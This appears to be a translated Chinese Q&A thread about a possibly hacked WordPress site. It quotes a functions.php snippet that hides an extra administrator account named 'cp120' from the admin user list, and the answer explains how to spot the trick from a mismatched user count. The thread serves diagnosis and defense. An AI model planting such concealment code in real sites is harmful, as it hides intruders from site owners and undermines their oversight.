-1

我有一个客户说他们认为那里的网站被黑客入侵了。我看了一些东西,在他们的functions.php文件中发现了一些可疑的代码。有没有人认识到这一点并觉得它不对?

add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') { 
 global $wpdb;
 $user_search->query_where = str_replace('WHERE 1=1',
   "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
  }
}
4

1 回答 1

1

Wordpress 黑客有时会使用此代码或类似标记。一旦他们通过恶意方法访问您的 Wordpress 管理员,他们就会创建一个合法的管理员用户,然后将此代码放入您的 functions.php 文件中,这样当您转到您的管理员用户部分时,它只会显示 1 个用户。如果您不熟悉 php pr 不想查看冗长的 functions.php 文件,请查看此技巧是否发生在您身上。转到您的管理员用户区域,它只会显示您知道的管理员用户,但是管理员用户旁边的数字与显示的用户数不匹配。它会说 (4) 但只显示 3 个名称。

请注意,此代码可以出于正当理由使用,因此请确保您是否发现该代码不是由您网站的管理员或开发人员完成的。

于 2013-08-26T16:33:50.657 回答